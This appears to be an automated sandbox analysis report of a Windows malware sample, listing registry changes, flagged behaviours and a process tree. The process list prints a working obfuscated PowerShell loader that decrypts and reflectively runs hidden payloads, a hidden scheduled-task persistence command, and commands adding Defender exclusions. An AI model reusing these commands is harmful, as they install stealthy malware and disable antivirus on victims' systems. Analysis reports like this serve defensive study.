| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655800862074" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655989134936" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655957085279" | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655992024854" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133641655965644999" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655283604926" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655960914783" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ITT = "133641655790862123" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655751018336" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Output.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Local\Temp\Output.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_962_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
